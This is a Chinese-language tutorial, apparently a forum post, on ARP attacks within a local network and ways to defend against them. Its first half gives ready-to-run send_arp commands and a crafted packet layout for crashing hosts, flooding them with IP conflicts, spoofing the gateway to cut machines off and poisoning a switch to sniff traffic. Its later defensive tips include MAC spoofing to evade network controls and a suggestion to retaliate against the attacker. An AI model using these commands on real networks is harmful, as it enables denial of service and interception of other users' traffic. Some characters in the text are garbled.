局域網攻擊原理與防備

網上關于ARP的資料已經很多了， 就不用我都說了。

用某一位高手的話來說， “我們能做的事情很多， 唯一受

限制的是我們的創造力和想象力”。

ARP也是如此。

以下討論的機子有:

一個要攻擊的機子：10.5.4.178

硬件地址：52:54:4C:98:EE:2F

我的機子： :10.5.3.69

硬件地址：52:54:4C:98:ED:C5

網關： 10.5.0.3

硬件地址：00:90:26:3D:0C:F3

一臺交換機另一端口的機子：10.5.3.3

硬件地址：52:54:4C:98:ED:F7

一:   用ARP破WINDOWS的屏保

原理：利用IP沖突的級別比屏保高， 當有沖突時， 就會

跳出屏保。

關鍵:     ARP包的數量適當。

[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 /

10.5.4.178 52:54:4C:98:EE:2F 40

二：用ARP導致IP沖突， 死機

原理：WINDOWS 9X， NT4在處理IP沖突時， 處理不過來， 導致死機。

注： 對WINDOWS 2K， LINUX相當于flooding,只是比一般的FLOODING

有效的多.對LINUX， 明顯系統被拖慢。

[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 /

10.5.4.178 52:54:4C:98:EE:2F 999999999

三：用ARP欺騙網關， 可導致局域網的某臺機子出不了網關。

原理:             用ARP應答包去刷新對應著要使之出不去的機子。

[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 /

10.5.4.178 00:90:26:3D:0C:F3 1

注意：如果單單如上的命令， 大概只能有效幾秒鐘， 網關機子里的ARP

高速緩存會被被攻擊的機子正確刷新， 于是只要...

四：用ARP欺騙交換機， 可監聽到交換機另一端的機子。

可能需要修改一下send_arp.C , 構造如下的數據包。

ethhdr

srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H

arphdr

hwtype:1 protol:800H hw_size:6 pro_size:4 op:1

s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3

d_ha:00:00:00:00:00:00 d_ip:10.5.3.3

然后就可以sniffer了。

原理:

交換機是具有記憶MAC地址功能的 , 它維護一張MAC地址和它的口號表

所以你可以先來個ARP 欺騙, 然后就可以監聽了

不過需要指出 , 欺騙以后, 同一個MAC地址就有兩個端口號

yuange說， “這樣其實就是一個競爭問題。 ”

好象ARP 以后, 對整個網絡會有點影響, 不過我不敢確定

既然是競爭 , 所以監聽也只能監聽一部分, 不象同一HUB下的監聽。

對被監聽者會有影響， 因為他掉了一部分數據。

當然還有其他一些應用， 需要其他技術的配合。

解決方法:

方法一:

網段A(192.168.0.x) 通過------> 網關服務器（192.168.0.1；192.168.10.1） -----〉

和網段B（192.168.10.x)通信。

假設架設 CS服務器在 網段B 192.168.10.88 機器上，

現在 在 網關服務器上架著一個端口轉發程序（有很多的自己找）

比如定義 網關服務器的27015端口 轉發 指定 192.168.0.10.88 的27015端口

現在在網段A(192.168.0.x) 的玩家只要的 互聯網游戲地址處加入 192.168.0.1:27015 就可以找到

192.168.10.88 的CS服務器了

個人認為比較好的 辦法是 把網段分開 ， 在網關服務器上做端口轉發服務

來達到 共享CS服務器等 功能， 就可以解決了~

方法二:

捆綁MAC和IP地址 杜絕IP地址盜用現象

到代理服務器端讓網絡管理員把您上網的靜態IP地址與所記錄計算機的網卡地址進行捆綁。 具體命令是:

　　ARP -s 192.168.0.4 00-EO-4C-6C-08-75

　　這樣， 就將您上網的靜態IP地址192.168.0.4與網卡地址為00-EO-4C-6C-08-75的計算機綁定在一起了， 即使別人盜用您的IP地址192.168.0.4也無法通過代理服務器上網。 其中應注意的是此項命令僅在局域網中上網的代理服務器端有用， 還要是靜態IP地址， 像一般的Modem撥號上網是動態IP地址就不起作用。 接下來我們對各參數的功能作一些簡單的介紹：

    ARP�� -s�牑� - d�牑� - a��

　　-s——將相應的IP地址與物理地址的捆綁。

　　-d——刪除所給出的IP地址與物理地址的捆綁。

　　-a——通過查詢Arp協議表來顯示IP地址和對應物理地址情況。

方法三:

網絡執法官這個軟件相信大家都聽說過了。 功能不錯， 可以禁止局域網任意機器連接網絡。 這個功能對網管來說的確不錯。 不過如果這個軟件落到那些卑鄙小人的手里---那后果就不堪設想了。 輕則把你封了上不了網， 重則可以導致整個局域網癱瘓。 。

廢話不說了， 切入正題吧。 現在教大家兩招輕松防范網絡執法官��！

NO 0.1

首先呢， 最穩妥的一個辦法就是修改機器的MAC地址， 只要把MAC地址改為別的， 就可以欺騙過網絡執法官， 從而達到突破封鎖的目的。 下面是修改MAC地址的方法：

linux環境下:

需要用

#ifconfig eth0 down

先把網卡禁用

再用ifconfig eth0 hw ether 1234567890ab

這樣就可以改成功了

要想永久改就這樣

在/etc/rc.d/rc.local里加上這三句(也可以在/etc/init.d/network里加下面三行)

ifconfig eth0 down

ifconfig eth0 hw ether 1234567890ab

ifconfig eth0 up

另:

在win2000中改MAC地址的方法:

打開注冊表編輯器， 找到HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Class/{4D36E972-E325-11CE-BFC1-08002BE10318}子鍵， 在該子鍵下的0000， 0001， 0002等分支中查找DriverDesc， 在0000子鍵下天一個字符串項， 命名為NetworkAddress， 鍵值設為修改后的MAC地址， 要求為連續的12個16進制數， 如1234567890AB(注意位數要對！不能是000000000000， 不能與別的機器重復)。 然后在0000下的NDI/params中加一項名為NetworkAddress的子鍵， 在該子鍵下添加名為defau

lt的字符串， 鍵值為修改后的MAC地址， 與上面的數值相同。 在NetworkAddress的主鍵下繼續添加命名為ParamDesc的字符串， 其作用是制定NetworkAddress主鍵的描述， 其值可為“MAC

地址”， 這樣以后打開網絡屬性， 雙擊相應的網卡會發現有一個高級設置， 其下坐在“MAC地址”的選項， 在此修改MAC地址就可以了， 修改后需重啟。

Windows環境:

用dos， 8139的可以改， 用realtek的pg8139.exe,比如

是8139c網卡， 就改寫8139c.cfg文件， 第一行就是網卡mac,想怎么改就怎么改

NO 0.2

另外一種方法， 我沒有試， 一種設想， 有條件的朋友幫忙試一下。

由于網絡執法官的原理是通過ARP欺騙發給被攻擊的電腦一個假的網關IP地址對應的MAC， 使其找不到網關真正的MAC， 那么我們可以自己修改IP->MAC的映射， 使網絡執法官ARP欺騙失效。 具體做法如下：

在還沒有被封鎖的時候進入CMD執行如下命令

e:/>ping 192.168.9.1 (假設此地址位網關。 )

Pinging 192.168.9.1 with 32 bytes of data:

Reply from 192.168.9.1: bytes=32 time<10ms TTL=64

Reply from 192.168.9.1: bytes=32 time<10ms TTL=64

Reply from 192.168.9.1: bytes=32 time<10ms TTL=64

Reply from 192.168.9.1: bytes=32 time<10ms TTL=64

Ping statistics for 192.168.9.1:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

e:/>arp -a

Interface: 192.168.9.1 on Interface 0x5000003

Internet Address Physical Address Type

192.168.9.1 00-0E-70-32-f1-02 dynamic

(上面的就是網關的MAC)

然后作這樣一個批處理文件保存起來。 。 注意！��！地址要換為你自己的網關的IP和MAC

arp -s 192.168.9.1 00-0E-70-32-f1-02

然后呢， 在你被封鎖的時候， 就執行這個批處理吧。

NO 0.3

如果解除了網絡執法官的封鎖可不可以查到使用網絡執法官的人究竟是誰呢?答案是可以！(感謝zva提供方法)利用arpkiller的sniffer殺手掃描整個局域網IP段查找處在“混雜”(監聽)模式下的計算機， 應該就是他了�。�！(注意， 掃描的時候自己也處在混雜模式， 自己不能算哦)

之后做什么呢？就不用我說了吧？哈哈， 以毒攻毒， 用網絡執法官把她封了！

防止這種攻擊最好的辦法就是MAC地址和IP地址綁定， 也可以防止用黑白名單時盜用白名單的IP， 對于一些單位的網絡控制也有點用處。 不會查MAC地址的初學者用 ipconfig/all 就可以顯示了